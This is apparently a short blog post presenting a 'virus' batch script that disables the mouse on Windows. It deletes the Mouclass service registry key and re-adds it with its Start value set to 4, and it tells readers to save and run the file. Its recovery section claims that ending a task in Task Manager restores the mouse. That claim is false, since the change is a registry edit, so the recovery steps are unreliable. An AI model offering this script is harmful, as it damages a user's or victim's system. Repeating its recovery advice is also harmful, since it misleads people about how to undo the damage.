Main menu

Pages

How to Disable Mouse by a Virus On Window PC



                          

Hi, Wanna do something crazy. Then, I have an amazing command  to disable our mouse.

How To Disable Mouse


1. First, Open Notepad and copy below codes


rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------




 2. Save this file as 
Disable.bat


 3. Now, double click on this file . You have done. Now  your mouse will not work.

How To Enable : 

1. Press 'Ctrl + Alt + Delete'.

2. Now, click on Task manager .

3. And, then End the task .


reactions

Comments